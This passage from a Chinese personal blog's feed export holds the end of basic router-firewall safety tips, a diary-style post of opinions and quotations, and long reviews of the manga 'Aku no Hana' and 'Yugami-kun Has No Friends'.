title="注意事项"></a>注意事项</h3><ul><li><strong>默认密码</strong>：出于安全考虑，如果你还在使用路由器的默认管理员密码，强烈建议更改为一个强密码。</li><li><strong>固件更新</strong>：确保路由器固件是最新的。旧的固件可能包含未修复的安全漏洞，定期检查并应用固件更新是保持网络安全的重要措施。</li><li><strong>备份配置</strong>：在进行重大更改之前，备份当前的路由器配置是一个好习惯。这样，如果新设置导致问题，你可以恢复到之前的状态。</li></ul><p>通过以上步骤，你可以在路由器上启用并配置防火墙，以增强网络的安全性。如果在配置过程中遇到问题，查阅路由器的用户手册或联系制造商的技术支持可能会有所帮助。</p>]]></content>
    
    
    <summary type="html">&lt;h1 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h1&gt;&lt;p&gt;因为不太了解硬件安全方面，最近在纠结这个问题。所以写了一篇文章来记录。&lt;/p&gt;</summary>
    
    
    
    <category term="硬件安全" scheme="http://example.com/categories/%E7%A1%AC%E4%BB%B6%E5%AE%89%E5%85%A8/"/>
    
    
    <category term="硬件安全" scheme="http://example.com/tags/%E7%A1%AC%E4%BB%B6%E5%AE%89%E5%85%A8/"/>
    
  </entry>
  
  <entry>
    <title>2024年1~3月感想</title>
    <link href="http://example.com/2024/03/18/2024%E5%B9%B41~3%E6%9C%88%E6%84%9F%E6%83%B3/"/>
    <id>http://example.com/2024/03/18/2024%E5%B9%B41~3%E6%9C%88%E6%84%9F%E6%83%B3/</id>
    <published>2024-03-17T16:00:00.000Z</published>
    <updated>2024-03-18T09:46:09.048Z</updated>
    
    <content type="html"><![CDATA[<p><img src="/images/Fern.png" alt="Fern"></p><span id="more"></span><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>好久没有写点感想了，来补充一下。</p><h1 id="杠精"><a href="#杠精" class="headerlink" title="杠精"></a>杠精</h1><p>愚蠢的人不自知，他们常常会认为自己是正确是客观，而把他人指出的错误或反驳的话当作是错误是主观。甚至在他们心中没有一个明确的正确观点。用现代词语称呼这类人即是“杠精”。</p><p>要区分一个人的观点究竟是正确错误或客观主观，最好的方法是这个观点是否能经得起逻辑推敲或能否印证事实。<br>但可怜的是，往往大部分杠精很难分清什么是辩论什么是诡辩。</p><p>辩论是符合逻辑的，是为了追求绝对正确而辩论。<br>诡辩纯粹是为了不愿承认自己的错误而用看似有理或想当然的话抬杠。</p><p>杠精的观点通常是先看到或听到一个片面的事实甚至只是假象，然后在脑中形成了一个观点。<br>观点形成后，就以观点为中心，面对他人的质疑或反驳不断诡辩抬杠以维护自己的观点。<br>因为杠精的逻辑思维比较弱，所以当他人用逻辑反驳时往往听不懂，反而会认为对方没有说服自己而沾沾自喜。</p><h1 id="说教"><a href="#说教" class="headerlink" title="说教"></a>说教</h1><p>人们总是理所当然地对地位不如己的人说教，却忘记了自己也有做得不好的地方。</p><h1 id="设定"><a href="#设定" class="headerlink" title="设定"></a>设定</h1><p>我们是朋友的本质是世界的设定，即这个梦的设定。它决定了我们是朋友，如果它决定我们是敌人就是敌人。<br>–来自梦中一个人的话</p><h1 id="随想"><a href="#随想" class="headerlink" title="随想"></a>随想</h1><p>你又不能往上走，你看天花板干什么。</p><h1 id="时间"><a href="#时间" class="headerlink" title="时间"></a>时间</h1><p>我真切地感受到时间的重要性，然而我也很难完全珍惜时间。</p><h1 id="教育"><a href="#教育" class="headerlink" title="教育"></a>教育</h1><p>Education has produced a vast population able to read but unable to distinguish what is worth to reading.<br>—George Macaulay Trevelyan</p><h1 id="才能"><a href="#才能" class="headerlink" title="才能"></a>才能</h1><p>才能是绝对的，但天才这个定义是相对的，将他放在不同环境中就可能会有不同的对象。</p><h1 id="自由"><a href="#自由" class="headerlink" title="自由"></a>自由</h1><p>Those who would give up essential liberty, to purchase a little temporary safety, deserve neither liberty nor safety.<br>– Benjamin Franklin</p><p>曾经听说这句话是hayek说的，也一直这么以为的，搜索了简中互联网，大部分也说这是hayek说的。直到我读了hayek的The road to serfdom才知道这句话是Benjamin Franklin说的，hayek只是在书里引用了这句话。<br>想要取巧偷懒，是万万不可的。一定要实践出真知。</p><h1 id="蠢坏"><a href="#蠢坏" class="headerlink" title="蠢坏"></a>蠢坏</h1><p>中国人的蠢坏is not born，之前我认为主要和education有关，现在又有了新的体会。中国人获取的信息很多都是劣质的，尤其是电视互联网的内容。认知受环境影响，如同浸泡在污水中生活。</p><h1 id="熬夜"><a href="#熬夜" class="headerlink" title="熬夜"></a>熬夜</h1><p>熬夜就像一个不肯认输的赌徒，已经输掉了今天，还要押上明天。<br>Staying up late is like a gambler who refuses to give in, having already lost today, yet still betting on tomorrow.</p><h1 id="做"><a href="#做" class="headerlink" title="做"></a>做</h1><p>想做什么，不要被人三两句话就劝退了。这样的话只能说明你只是在玩过家家。让人看不起。</p><h1 id="黄仁勋-Jensen-Huang"><a href="#黄仁勋-Jensen-Huang" class="headerlink" title="黄仁勋(Jensen Huang)"></a>黄仁勋(Jensen Huang)</h1><p>I want to say something and it’s going to sound completely opposite of what people feel. Over the course of the last 10 years, 15 years, almost everyone who sits on a stage like this would tell you it is vital that your children learn computer science. Everybody should learn how to program. And in fact, it’s almost exactly the opposite. It is our job to create computing technology such that nobody has to program, and that the programming language is human. Everybody in the world is now a programmer. This is the miracle of artificial intelligence. The countries, the people that understand how to solve a domain problem in digital biology or in education of young people or in manufacturing or in farming, those people who understand domain expertise. Now can utilize technology that is readily available to you. You now have a computer that will do what you tell it to do. It is vital that we upskill everyone and the upskilling process, I believe will be delightful, surprising.</p><p>我想说一些话，这可能会与人们的普遍感觉完全相反。在过去的10年、15年里，几乎每个像我这样站在讲台上的人都会告诉你，让你的孩子学习计算机科学是至关重要的。每个人都应该学会编程。但实际上，情况几乎恰恰相反。我们的工作是创造计算技术，使得人们不必编程，而编程语言应该是人类的语言。现在世界上的每个人都是程序员。这是人工智能的奇迹。那些国家，那些了解如何在数字生物学、年轻人教育、制造业或农业等领域解决专业问题的人们，那些拥有领域专业知识的人们，现在可以利用现成的技术。你现在拥有一个会按照你的指令执行的计算机。提升每个人的技能是至关重要的，而我相信，提升技能的过程将是愉快和令人惊喜的。</p><h1 id="意识"><a href="#意识" class="headerlink" title="意识"></a>意识</h1><p>下意识的行为不可避免，但下意识后还有自己的主动意识可以补救。</p><h1 id="无聊"><a href="#无聊" class="headerlink" title="无聊"></a>无聊</h1><p>不要说无聊的事，当指出这点时不要不满。对己对他人都是。</p><h1 id="每天"><a href="#每天" class="headerlink" title="每天"></a>每天</h1><p>无所适从是来自于精确性不足。</p><h1 id="弱智"><a href="#弱智" class="headerlink" title="弱智"></a>弱智</h1><p>应该给每个成年人划定一个弱智指数，指数的初始值为20，在0-100之间，越高说明越弱智。</p><p>按照客观情况划分各种弱智类型，预计至少能划分出10种类型。目前我已划分出来的有：刻舟求剑、吹毛求疵、自以为是、无脑爱国、信口雌黄、层次太低、狗屁不通。每满足一种弱智类型，就加5-10分。对于有一方面能力突出者，可以减5分。</p><p>测试弱智指数的方式，是给定几段材料（包括熟悉的领域，不熟悉的领域，媒体的报道，个人的看法），不加引导，让测试者对每段材料发表自己不少于100字的观点看法，然后根据发表的内容查找是否有相应的弱智类型以及严重程度。</p><p>最后综合分数如果达到80分以上，这种人最好不要接触，除非是无法离开的亲人；即使是朋友也要慎重远离。如果达到50-79分之间，这种人还能尝试纠正错误的观念来降低其弱智指数，但面对陌生人最好不要理会；如果达到30-49分之间，这样的人一般就是正常能有效沟通的人了；如果达到0-29分之间，这样的人在眼界层次或为人处世等方面会比较突出。</p><h1 id="目标"><a href="#目标" class="headerlink" title="目标"></a>目标</h1><p>Life has no goal like ice cream no cream.</p><h1 id="马斯克"><a href="#马斯克" class="headerlink" title="马斯克"></a>马斯克</h1><p>虽然谈了很多次马斯克，不过仍然能从他身上学到东西。</p><p>从马斯克身上学习到的两点：</p><ol><li>不要去努力纠正你的缺点。如果缺点影响了你的目标，这只能说你没有把目标放在第一位或者这不是你真正想要的目标。</li><li>不要给自己施加限制器。你可以承认自己在哪一点上做得不如他人，但是不要认为这辈子就这样了，人生中很多事不是只有一次机会。承认自己的平凡，也是一种限制器，是放弃的标志。You can do everything.</li></ol>]]></content>
    
    
    <summary type="html">&lt;p&gt;&lt;img src=&quot;/images/Fern.png&quot; alt=&quot;Fern&quot;&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="日志" scheme="http://example.com/categories/%E6%97%A5%E5%BF%97/"/>
    
    
    <category term="日志" scheme="http://example.com/tags/%E6%97%A5%E5%BF%97/"/>
    
    <category term="生活" scheme="http://example.com/tags/%E7%94%9F%E6%B4%BB/"/>
    
  </entry>
  
  <entry>
    <title>绽放的每一片花瓣—[恶之华]</title>
    <link href="http://example.com/2024/03/08/%E6%81%B6%E4%B9%8B%E5%8D%8E/"/>
    <id>http://example.com/2024/03/08/%E6%81%B6%E4%B9%8B%E5%8D%8E/</id>
    <published>2024-03-07T16:00:00.000Z</published>
    <updated>2024-03-08T04:23:14.699Z</updated>
    
    <content type="html"><![CDATA[<p><img src="/images/evil_1.png" alt="恶之华"></p><span id="more"></span><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>花了2小时看完了这部作品。老实说看到这部漫画上存在的标签“黑暗”，我是并没有怎么感觉到。我认为这是“疯狂”，为了追寻什么却一时间蒙蔽双眼，而不是伸手不见五指的“黑暗”。</p><h1 id="主要角色"><a href="#主要角色" class="headerlink" title="主要角色"></a>主要角色</h1><p>春日高男<br>本作的主角，有着朴素且中性的外表。是初二学生。从初一开始就对佐伯抱有单相思。兴趣是阅读，尤其偏爱波德莱尔的《恶之花》。成绩不佳，对自己的内心世界与现实社会之间的鸿沟感到沮丧。性格自我意识过强，加上内向且有轻微洁癖，在人际关系上容易建立障碍。在同班同学中的评价不是很好。</p><p>仲村佐和<br>本作的女主角。坐在春日正后方的位置，是一位染着茶色头发、戴着眼镜的波波头女孩。当和春日二人独处时，她会表现出丰富的情感并常常摘下眼镜，但平时则是面无表情且冷淡。对于长辈也展现出极其尖酸刻薄且不善交际的性格，与周围人的摩擦不断，但她毫不顺从，坚持对社会规范和常识表示蔑视。她从不向任何人展示自己的脆弱面，散发出足以令教师也畏缩的强大威慑感，常对他人不协调并频繁说出粗鲁的话。被视为一个超出叛逆期、难以理解的问题少女，因此备受排斥。</p><p>佐伯奈奈子<br>本作女主角之一。是初二学生。她拥有一头黑色的长发，给人一种淑女般的美少女气质和温婉的氛围，因“身材也很好”而受到男生的欢迎。成绩优异，周围人对她有一种稳重的优等生形象，但这也使她承受了许多烦恼。内心深处，她感到对周围期望的迎合带来的是一种模糊的空虚，虽然她面临自我认同的困扰，但同时性格认真且保守，拥有充分的常识和社交能力。</p><p>常磐文<br>本作女主角之一。她有着茶色的波波头，外表在某种程度上与仲村相似，这成为了春日开始对她感兴趣的契机。她是右岸高等学校二年级的学生，与春日不在同一个班级。身高高挑，拥有好身材的美女，在男生中很受欢迎。她与打工地点的另一所学校的前辈晃司交往，但对方只看重表面的态度让她感到愈发不满，最终在春日告白之际，她们迎来了分手。之后，她与春日开始交往。</p><h1 id="内容概述"><a href="#内容概述" class="headerlink" title="内容概述"></a>内容概述</h1><p>春日高男暗暗心仪着同班的美少女佐伯奈奈子。某天放学后，一时冲动偷走了她的体操服，但这一行为被不受欢迎的女生仲村佐和看见了。陷入困境的春日，被仲村提出的无理要求所左右，在一个意外的机会下开始与佐伯交往，随后被爱恋与道德的自我矛盾所折磨。与此同时，佐伯也开始逐渐表露出她内心深处的意愿，仿佛是在响应春日的心声。在一场离家出走的大雨中春日迷失了自己，开始向仲村疯狂示好，最终两人自杀未遂。</p><p>三年后，春日高男在埼玉县度过了他的高中生活。一场骚动之后，虽然与仲村分开，春日却无法彻底放下对她的思念，每天活得魂不守舍。这样的春日，因为某个契机，开始与男生们仰慕的对象常磐文深入交流，并在常磐身上感受到了仲村的影子…</p><h1 id="聚焦而非全面"><a href="#聚焦而非全面" class="headerlink" title="聚焦而非全面"></a>聚焦而非全面</h1><p>恶之华这部漫画的同名诗集，早早听说过，却没有看过，也就无从得知作品中的角色们是为何喜欢了。但对于恶之花这个词，一看到就能感受到一种美感，这种美感的来源我无法说清道明，不过正如漫画中描绘的形象那般，是独特和纯黑的存在。</p><p>如同一支笔划过了一张白纸，这就是故事的开头。就这部作品而言，很多地方的情节都让我觉得并不自然，比如佐伯与春日之间的关系发展得过于迅速，对环境的描绘过于简略，与其说是校园故事，不如说它其实就是三个人之间的故事。它把用来使情节充实的笔墨，更多地用在了给人冲击和印象的方面，放弃了全面的描绘而选择了聚焦于少数几人。书有11卷，我读得很快，2个小时就看完了。故事其实并不复杂，主要角色也并不多，复杂的是作品的表达。</p><h1 id="存在的青春"><a href="#存在的青春" class="headerlink" title="存在的青春"></a>存在的青春</h1><p>以我个人看来，本作想要表达的是探寻存在。主角春日从一开始的存在，变为了虚无，为了和仲村去到山的另一边，也即找到存在，他们开始了疯狂的举动。最后却被佐和点醒他们全都身处灰色空间，没有一片地方是存在。但其实，或许春日没有那个自觉，但是他本身地疯狂，就是存在。而仲村和佐和，就是为了能够抓住春日这个存在，而选择了在他身边。</p><p>所谓存在，古往今来有许多哲学家都在思考这个问题，我并不能给出多么好的答案。对我而言，与其将作品中角色们的所作所为诠释为“青春”这种现象，我更愿意称之为“存在”。在故事的起初，书呆子春日是“存在”的，他会喜欢书，能说出看书就是在看不同的世界这样的话，对于他发自内心的喜爱，佐伯被深深打动了，因为她做什么事都不是出于自己的喜爱，在佐伯心中此时的春日是一个独特的存在。仲村这个极具破坏性的角色，让春日的“存在”瓦解了，她利用春日的弱点强迫他做着许多事，在不知不觉中春日同化为仲村这样的人了。</p><h1 id="空虚与存在之恶"><a href="#空虚与存在之恶" class="headerlink" title="空虚与存在之恶"></a>空虚与存在之恶</h1><p>恶之花就在仲村身上绽放着，她内心空虚，因此认为小镇上所有安然生活着的人都是一种假象，即她口中的伪装。因此她要作为理所当然的“恶”去对抗所有人，而本质上也是在对抗内心的空虚。她幻想着春日与自己是同样的人，好让她能够有同伴，而只要有了同伴，那么仲村自己就不再空虚，就能够成为存在者。起初的春日被仲村奴役着，心存罪恶感而被“恶”给奴役。随着仲村一天天施加给春日变态的思想，春日开始被压垮，他的心中存在着罪恶感，却无法与他人言说，唯一知道这件事的只有仲村。尽管一开始仲村并非春日的同伴，随着他们一起做了涂抹教室这样的事，终究成为了一条绳上的蚂蚱。</p><p>时间在流逝，不是精心策划的事，纸包不住火那自然是理所当然的。终于，春日被压垮了，他彻底成为了仲村的同伴，仲村想要去山的另一边，找到“存在”，春日也想去山的另一边，为了逃避。其实在这时的春日只要与仲村在一起，去哪里都可以。剧情来到了两人一起在去山的另一边的过程中，被淋湿的片段。春日瞥见被雨淋湿的仲村的胸罩，转过头去感到了害羞，此时的仲村发觉春日根本不是和自己想的那样是个变态是同类，于是她试着说出：“我腻了！我们回去吧！”这样的话，此时感觉小镇没有容身之处的春日想要逃避的强烈的新让他听到这话根本不同意，仲村察觉到骑虎难下便也只能说出自己是开玩笑的。</p><p>佐伯与春日和仲村二人相遇后，这一段故事来到了最高潮的部分，是选择佐伯还是仲村？他迷茫了，他说出了我是空壳，否定了过去习惯于看书的自己。认为自己看书不过是在陶醉，认为选择看书不是真正的自己。事实真的如此吗？我不这么认为。每个人的生命中，能够完全由自己主导且不受他人干扰的选择其实非常少，每个人都是在受各种因素干扰的选择过程中慢慢明白了自己想要成为什么样的人。春日现在对自己的否定，实际上是在否定自己的选择，在否定自己的“存在”。</p><p>过了一段时间后，春日无法忍受内心的“空虚”，他已经把原本填补自己内心空虚的书籍给丢弃了。春日找了另一个填补内心空虚的方式，那就是满足仲村的愿望。他开始疯狂地用各种方式满足仲村，迷失在了一个谁也不知道的地方。即使如此，春日还是重新成为了存在者。他虽然认为自己是空壳，但是他的行动是只有存在者才能做出的。他和仲村虽然搭建起了桥梁，却从未真正地处于同一片地方。最后的仲村之所以把一同赴死的春日给推开，也是因为他们从未成为同一类人。未能成功赴死的春日，内心的恶之花从睁眼到闭上了眼，“存在”又转为“空虚”了。</p><h1 id="“存在”在此身"><a href="#“存在”在此身" class="headerlink" title="“存在”在此身"></a>“存在”在此身</h1><p>镜头一转，来到了几年后读高中，因为未曾真正放下内心对文学的热爱，因偶然契机开始向常磐借书。不敢向他人展现自身真实一面的常磐，因为春日与自己有了共同喜好，而敞开心扉。常磐是一个坚信自己是存在者，同时她又害怕与周围的人格格不入，于是伪装了自己，与周围的空壳相处。某天发现了与自己是同类的春日，自然是满心欢喜，见过了太阳便很难再忍受黑暗的日子了。同样的，春日也是这样。</p><p>在桥上走着，不断诘问自己常磐是不是仲村的替身，与心魔展开了激烈的辩论，最终战胜了心魔，捏碎了恶之花，清晰地表达了自己内心的诉求—想要和常磐在一起。他终于不再为了自己是存在还是虚无而迷茫，他已经手握了那份真实，实实在在地存在于这个世界上。最后要解决的，也只有与过去达成和解了。不是去抱怨，也不是后悔，更不是销毁过去。与自己和解，与仲村和解。他并没有解开什么是“存在”这个谜团，但此时的他切实地把握着某些东西，攥紧独属于自己的那一份“存在”！</p><h1 id="我的感想"><a href="#我的感想" class="headerlink" title="我的感想"></a>我的感想</h1><p>每个人都会度过自己的青春，或压抑，或欢喜。同样的，于每个人内心深处都有一朵恶之花，它怂恿着人去走向不可能达到的彼岸，就像西西弗斯背着巨石前往山顶。在这个过程中，有的人会找到了属于自己的彼岸，放下了执念；有的人仍背负着恶之花，渴望着彼岸。而恶之花的花瓣，终有一天会散落，飘零在每个人心间。</p><p><img src="/images/evil_2.png" alt="恶之华"></p>]]></content>
    
    
    <summary type="html">&lt;p&gt;&lt;img src=&quot;/images/evil_1.png&quot; alt=&quot;恶之华&quot;&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="漫画" scheme="http://example.com/categories/%E6%BC%AB%E7%94%BB/"/>
    
    
    <category term="漫画" scheme="http://example.com/tags/%E6%BC%AB%E7%94%BB/"/>
    
  </entry>
  
  <entry>
    <title>自己就是自己最好的朋友—[汤神君没有朋友]</title>
    <link href="http://example.com/2024/03/08/%E6%B1%A4%E7%A5%9E%E5%90%9B%E6%B2%A1%E6%9C%89%E6%9C%8B%E5%8F%8B/"/>
    <id>http://example.com/2024/03/08/%E6%B1%A4%E7%A5%9E%E5%90%9B%E6%B2%A1%E6%9C%89%E6%9C%8B%E5%8F%8B/</id>
    <published>2024-03-07T16:00:00.000Z</published>
    <updated>2024-03-08T04:20:02.301Z</updated>
    
    <content type="html"><![CDATA[<p><img src="/images/Vol.16_cover.jpg" alt="yugami-kun have no friend"></p><span id="more"></span><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>这部作品是在bgm上翻每年的高分漫画榜单看到的，碰巧b漫上有这部，我就全部下载来看了。看的过程中得知了漫画原本是打算只画1卷，却画起了发展路线。这种短篇变长篇我一开始还挺担心的，但看完后才发现这样的担心是多余的，甚至出乎我的意料。</p><h1 id="主要人物"><a href="#主要人物" class="headerlink" title="主要人物"></a>主要人物</h1><p>汤神裕二<br>10 月 17 日出生；AB 型；176 厘米&#x2F;65 千克。作品中的主要人物。2A 至 3A 班。左撇子。<br>一个不需要朋友，总是喜欢独处的古怪男生。他是棒球队的王牌，学习成绩优异，但由于他的快节奏、逻辑性强的性格和直率、不爱说话的态度，他被同学和棒球队的同伴视为讨厌鬼，尽管他并无恶意。<br>他是一个勤奋的人，不断努力提高自己，精心计划个人生活的每一个细节。尽管他生性多疑，但却有着开朗、积极的人生态度，而且很容易跑题。他把帮助别人作为每天的例行公事（因为他相信只要积德，运气就会回到他身上）。<br>虽然有很强的责任感和意志力，但不会把自己的想法强加于人。<br>他是落语平乐的忠实粉丝，经常听他的落语，一旦谈到落语，他就会忘乎所以，不管对方是谁，都会有一搭没一搭地说个不停。<br>在家里，他养着两只绿龟，不遗余力地改善它们的生活环境。他最喜欢吃咖喱包。他的爱好包括落语和棒球，以及游览城堡、下围棋和将棋（日本象棋）、星期天做木工和打保龄球。重原退役后，他担任棒球队队长。<br>他周围的人将他与绵贯千寻的关系描述为一种共生关系，两人互为补充，但并非朋友。</p><p>绵贯千寻<br>6 月 20 日出生；A 型身材，身高 160 厘米&#x2F;体重 48 公斤。女主角。2A 班 至 3A 班。<br>转到汤神班上的学生。因为她父母的关系常常转校，所以她希望在这个可以长期定居的地方尽快交到朋友。她是一个善良的女孩，但由于害羞和笨拙，她的日常生活并不顺利。<br>她没有主动性，很容易动摇，所以大多数事情她都听之任之。如果汤神遇到困难，她就会伸出援手，有时也会得到汤神的帮助。虽然她总是被汤神和周围的骚动所吸引，但她很容易相处，有优点也有缺点……<br>当她反思自己对汤神的感情时，她意识到，汤神不被周围的环境所迷惑，即使在困难的时候也不后悔自己的行为，这让她感到很欣慰。她是唯一一个能在一定程度上解读汤神话语背后真正含义的人。<br>她长相清秀，在她的作品中常被形容为 “可爱”，但同时也被形容为 “没有灵气”，给人一种朴素的感觉。她的爱好是毛毡制作。她参加了手工社团，高年级的学生都毕业后，只有她一个人。当老师提出社团可能会停办时，她设法招来了新学生野上诗织和驹井。</p><p>门田春树<br>棒球部。与汤神在少年时期就认识。汤神的专用捕手。常常帮汤神跑腿，认为他很麻烦。</p><p>藤泽梨绪<br>2D班。因一年级时裕二出手帮忙她完成体育祭的美工作业而喜欢上裕二，但知晓汤神的性格后，感到非常后悔。非常热爱棒球，还指出棒球队内部问题。跟绵贯是很好的朋友。</p><p>百濑香织<br>田径队。占有欲极其严重。原本讨厌绵贯，因她与自己最讨厌的汤神说话，经过毕业旅行的相处后，向绵贯道歉并且和好。相当敌视汤神到让绵贯误以为是喜欢，认为裕二是让久住烦恼的人。</p><p>八重㭴良太<br>2A班。历史研究部部长。身体相当虚弱，不太适合喝咖啡。非常崇拜裕二。</p><h1 id="内容概述"><a href="#内容概述" class="headerlink" title="内容概述"></a>内容概述</h1><p>绵贯千寻高二转学后，遇到了喜欢独处的汤神。除了是棒球队的王牌外，汤神的个性使他在班上独来独往，他沉浸在自己喜欢的落语故事中，并享受着独来独往的生活。而千寻性格腼腆，无法融入班级。在这种情况下，她被汤神的个性所吸引，并得到了他坦率意见的帮助。他还遇到了为汤神担心的棒球队的门田和久见，以及爱上汤神的藤泽，逐渐适应了新的生活。</p><p>很快，时间在各种事件中流逝：夏天，汤神在集市上因为乌龟引起了骚动；秋天，汤神在校庆上的表演和修学旅行中的迷路引起了骚动；冬天，汤神和千寻的落语约会引起了骚动；千寻的父亲调往美国也引起了骚动。然后，随着春天的到来，他们升入三年级，又发生了棒球社和手工艺社新成员的骚乱、天城高中的林山向千寻表白，并向汤神发出挑战书的骚乱、千寻宣布与汤神绝交的骚乱，尽管如此，汤神的日常生活仍在继续。</p><h1 id="角色驱动"><a href="#角色驱动" class="headerlink" title="角色驱动"></a>角色驱动</h1><p>汤神君没有朋友和大多数校园日常作品不同，其它作品大多是通过剧情或点子来引导作品走向，而汤神君没有朋友却是以角色间的互动来发展的。其中的核心角色毋庸置疑就是主角汤神君，我们可以看到很多大大小小的事都是与汤神直接或间接相关的。</p><p>最开始看时，仿佛面前突然立起了一座大山，远远望去，这座山给人的感觉就是高大巍峨这样突出的印象罢了。然而，当我们走近这座山，慢慢地开始攀爬的时候，一点点的又会有了新感受。汤神就是这样，起先给人的印象只是特立独行不近人情，随着女主角绵贯千寻一点点与他接触，我们看到了更加立体的汤神，他非常努力，会长久地记仇，会因外界感到压力，会不信任没有努力的人，会偷偷地害羞，为了自己的原则绝不退让……实在太多细节难以一一道尽。</p><p>正是这样，不断向前发展的剧情，更多是由角色自身与角色之间的互动推动的。剧情虽然算不上细腻，但通过角色的互动也带来了有趣。</p><h1 id="强大的自我"><a href="#强大的自我" class="headerlink" title="强大的自我"></a>强大的自我</h1><p>在本作中，汤神的自我是最强大的，这毋庸置疑。不过，这份强大并非与生俱来。如果只是随波逐流，是肯定无法获得这份强大的。那么从汤神的身上有哪些使他的自我强大的因素呢？首先是独立思考。遇到了什么，不是先去参考别人的观点，而是自我思考，去钻研本质。其次是合理规划，汤神总是会写着周密的计划，面对不熟悉的事物为了尽快解决会写日志总结，比如养狗日记。最后是快速行动与有力执行，想要什么就去做，不磨磨蹭蹭。</p><p>那么有着这样强大的自我，随之而来的就是洋溢的自信，不会轻易动摇。在面对修学旅行的小组时，不是组长却主导了组长的计划，迷路也会勇敢给出看法，让他人觉得汤神可靠安心，值得依赖，也能够吸引他人。在这些伴随而来的好品质下，也让汤神进一步变得无懈可击。像是百濑想要找出汤神的弱点，却最终无功而返。纵使全校都流传着汤神的谣言，也无法让汤神感到不适，甚至没有想要去澄清，他知道，谣言的广泛传播并不是源于他人的关心，不过是大多数人一时的八卦与看热闹的心态罢了。无论关于他自身的事被歪曲成什么样，也没有人比他自己更清楚自己的事了。自己知道真相，那就足够了。<br><img src="/images/yugami-kun_1.jpg" alt="yugami-kun"></p><h1 id="自我与朋友"><a href="#自我与朋友" class="headerlink" title="自我与朋友"></a>自我与朋友</h1><p>朋友是亲人与恋人之外的广泛存在，人要接触外界社会，就很难说不需要朋友。不过，本作中的汤神却是以没有朋友来开篇。理由很简单，因为他认为人际关系浪费时间，与其交友不如做自己喜欢的事。很多时候，人们需要朋友只是害怕寂寞无聊，是一种从试探到互助再到相互信赖的关系。一直被汤神当作反例的绵贯完全是一个没有朋友就会感到无所适从的人，在别人讨厌后也只想着自己的错，她就是这么一个需要朋友的人。但是汤神点出了绵贯的不足之处：外在的行动方面，想交朋友却畏于尝试。于是汤神特意买了新面包想告诉她：人也要像面包一样，不断进化。内在的精神方面，是因为没有自我，不知道自己想要什么，不知道该做什么，也不知道和自己做朋友，这是根本原因，也是困扰了门田、藤泽等人的原因。或许这与富兰克林说过关于自由的话有着异曲同工之妙吧。用在这里就是：想要用朋友来换取自我，最终既得不到朋友，也得不到自我。</p><p>汤神不是这样，他自始自终都在做自己，遇到了像是高年级自行车挪动的不公之事不会退让；面对老师的批评会直接说出自己的感受，对于喜欢的落语奋不顾身。他就是这样一个内心强大的人。他知道自己想要什么，所以不会害怕寂寞无聊；面对事件首先想到的是自行解决，所以他不需要朋友间的互助。然而，他也并非是万无一失的人，他对自己喜欢的东西也会滔滔不绝地讲给绵贯听，以此来排解想要分享的欲望。听到绵贯说出的绝交也会暗自感到难过，赛场上压力大时也会不自觉地看向喜欢的人。汤神并非冷漠无情，他会迁就守护妹妹，选择把交友的时间花在更多喜欢的事物上，而不是在意他人言语。</p><p>作品中对于自我与朋友的探讨，表现得最精彩的一处情节，莫过于老师请汤神吃炸猪排饭了。老师的看法是只要与朋友一起吃，什么都无所谓。然而他的看法却被汤神的一句话给击败了：“老师您真的有认真对待每一餐吗？”这就是两人差别最大的一点，老师过于在乎朋友，忽视了用心去品尝食物。汤神则不同，他会试着按不同顺序吃炸猪排饭，会在绝佳时刻喝下味增汤，会去考虑如何正好将米饭全部吃完……还有雨天的时候绵贯忘带伞而被困住，遇到了汤神，他毫不留情地批判了绵贯：连自己都顾不好，却成天为所谓的朋友忙前忙后，最后自己有难时也没人来帮忙。</p><p>与朋友相处固然令人愉快，然而因此忽视了自身感受就本末倒置了，因为最好的朋友就是自己啊！</p><h1 id="从本质看待事物"><a href="#从本质看待事物" class="headerlink" title="从本质看待事物"></a>从本质看待事物</h1><p>从现象看待事物的时候或许会暧昧不清，从本质看待的时候过于清晰一阵见血而常常让人感到不适。大多数人都是喜欢前者的，以媒体新闻举例，即使媒体对一件事说得天花乱坠或耸人听闻，只要吸引人眼球，人们就愿意相信。然而汤神是属于后者，他常常从本质看待事物，不仅如此，他还会把自己的感受直接表达出来，让他人感到不适。</p><p>印象中有两次顶撞老师，其中一次是因为汤神早早做完暑假作业而老师搞忘了以为他没做被找到办公室，面对一笔带过的老师，汤神毫不留情地说出了自己的感受：“老师，为什么我们忘了什么东西的时候，你就对我们那么严厉。这回轮到您自己忘了，难道就可以这么轻描淡写地带过吗？”结果汤神受到了一通斥责。说到这儿，我想起了太宰治曾说过的话：“我们有晚辈对长辈的礼仪，学生对老师的礼仪，却没有长辈对晚辈的礼仪，老师对学生的礼仪。”这是值得思考的，面对地位不如自己的人，我们真的有在尊重吗？</p><p>还有一件事是藤泽到汤神家中道歉，却被汤神问道为什么要道歉。随着汤神用着苏格拉底式的诘问一点点地，最终汤神说出了藤泽道歉的目的：“为什么，你会想着用我来提高自己的人品啊！”尽管这里用了搞笑的方式来表现，但当我们深入想想的时候会发现，是啊，很多时候都是这样，我们口口声声说做某事是为了对方好，可实际上呢？只不过是为了能让自己心安，满足自己的欲望等等。</p><h1 id="两人的距离"><a href="#两人的距离" class="headerlink" 